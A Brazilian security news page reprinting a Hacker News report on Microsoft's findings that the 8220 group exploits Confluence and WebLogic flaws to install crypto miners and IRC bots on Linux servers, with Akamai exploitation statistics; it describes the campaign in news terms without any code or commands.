Últimas notícias

Fique informado

Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers

1 de julho de 2022

Spotlight

Do Deepfake ao ChatGPT: como a evolução tecnológica está influenciando as fraudes e golpes que vemos hoje?

Os golpes, de falsificação de identidade bancária a investimentos fictícios e golpes românticos, são cada vez mais diversificados

20 de maio de 2024

Contato Seguro une forças com a DOC9 para trazerem mais segurança aos abrigos do Rio Grande do Sul

Contato Seguro une forças com a Doc 9 para trazerem mais segurança aos abrigos do Rio Grande do Sul. Essa parceria é essencial para enfrentar o momento difícil que o estado está passando devido às enchentes.

20 de maio de 2024

Governo Federal apoia Rio Grande do Sul na emissão 2ª via da Carteira de Identidade Nacional

O mutirão coordenado pelo Governo do RS começou nos abrigos de Porto Alegre. Expedição da segunda via será imediata

20 de maio de 2024

Reconhecimento facial: a nova fronteira de segurança em meio aos desafios dos Deepfakes

A capacidade dos deepfakes de imitar e falsificar identidades compromete diretamente a eficácia do reconhecimento facial

20 de maio de 2024

Nuvens Tempestuosas: Navegando pelo Panorama Complexo da Cibersegurança na Nuvem

Enquanto as organizações migram cada vez mais dados e serviços para a nuvem, a complexidade e a magnitude das ameaças cibernéticas também crescem.

15 de maio de 2024

A cloud threat actor group tracked as 8220 has updated its malware toolset to breach Linux servers with the goal of installing crypto miners

A cloud threat actor group tracked as 8220 has updated its malware toolset to breach Linux servers with the goal of installing crypto miners as part of a long-running campaign.

“The updates include the deployment of new versions of a crypto miner and an IRC bot,” Microsoft Security Intelligence said in a series of tweets on Thursday. “The group has actively updated its techniques and payloads over the last year.”

8220, active since early 2017, is a Chinese-speaking, Monero-mining threat actor so named for its preference to communicate with command-and-control (C2) servers over port 8220. It’s also the developer of a tool called whatMiner, which has been co-opted by the Rocke cybercrime group in their attacks.

In July 2019, the Alibaba Cloud Security Team uncovered an extra shift in the adversary’s tactics, noting its use of rootkits to hide the mining program. Two years later, the gang resurfaced with Tsunami IRC botnet variants and a custom “PwnRig” miner.

Now according to Microsoft, the most recent campaign striking i686 and x86_64 Linux systems has been observed weaponizing remote code execution exploits for the freshly disclosed Atlassian Confluence Server (CVE-2022-26134) and Oracle WebLogic (CVE-2019-2725) for initial access.

This step is succeeded by the retrieval of a malware loader from a remote server that’s designed to drop the PwnRig miner and an IRC bot, but not before taking steps to evade detection by erasing log files and disabling cloud monitoring and security software.

Besides achieving persistence by means of a cron job, the “loader uses the IP port scanner tool ‘masscan’ to find other SSH servers in the network, and then uses the GoLang-based SSH brute force tool ‘spirit’ to propagate,” Microsoft said.

The findings come as Akamai revealed that the Atlassian Confluence flaw is witnessing a steady 20,000 exploitation attempts per day that are launched from about 6,000 IPs, down from a peak of 100,000 in the immediate aftermath of the bug disclosure on June 2, 2022. 67% of the attacks are said to have originated from the U.S.

In the lead, commerce accounts for 38% of the attack activity, followed by high tech and financial services, respectively,” Akamai’s Chen Doytshman said this week. “These top three verticals make up more than 75% of the activity.

The attacks range from vulnerability probes to determine if the target system is susceptible to injection of malware such as web shells and crypto miners, the cloud security company noted.

“What is particularly concerning is how much of a shift upward this attack type has garnered over the last several weeks,” Doytshman added. “As we have seen with similar vulnerabilities, this CVE-2022-26134 will likely continue to be exploited for at least the next couple of years.”

Source: The Hacker News

Hackers aren’t so interested in your credit card data these days. That’s bad news

Hacking Scenarios: How Hackers Choose Their Victims

Another Israeli Firm, QuaDream, Caught Weaponizing iPhone Bug for Spyware